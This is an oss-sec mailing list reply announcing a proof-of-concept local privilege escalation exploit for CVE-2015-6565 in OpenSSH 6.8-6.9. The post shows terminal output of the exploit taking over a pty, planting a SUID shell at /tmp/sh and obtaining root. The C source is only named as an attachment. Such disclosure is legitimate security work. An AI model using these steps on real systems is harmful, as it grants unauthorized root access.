oss-sec mailing list archives
Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux
From: up201407890 () alunos dcc fc up pt
Date: Thu, 26 Jan 2017 10:07:24 +0100
Hi list,I know I'm late to the party, but I was bored, so I decided to write an exploit for CVE-2015-6565 which affects OpenSSH 6.8-6.9 It is mostly considered to be a "DoS", even though Jann Horn publicly told how it could be exploited for local privilege escalation, but I guess its either PoC||GTFO for users to update.
From https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565"sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY devices, which allows local users to cause a denial of service (terminal disruption) or possibly have unspecified other impact by writing to a device, as demonstrated by writing an escape sequence."
I think the description should be updated. $ gcc not_an_sshnuke.c -o not_an_sshnuke $ ./not_an_sshnuke /dev/pts/3 [*] Waiting for slave device /dev/pts/3 [+] Got PTY slave /dev/pts/3 [+] Making PTY slave the controlling terminal [+] SUID shell at /tmp/sh $ /tmp/sh --norc --noprofile -p # id euid=0(root) groups=0(root) Thanks, Federico Bento. ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.
Attachment:
not_an_sshnuke.c
Description:
Current thread:
- Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux up201407890 (Jan 26)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux Noryungi (Jan 26)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux up201407890 (Jan 26)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux Sebastian Krahmer (Jan 31)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux Noryungi (Jan 26)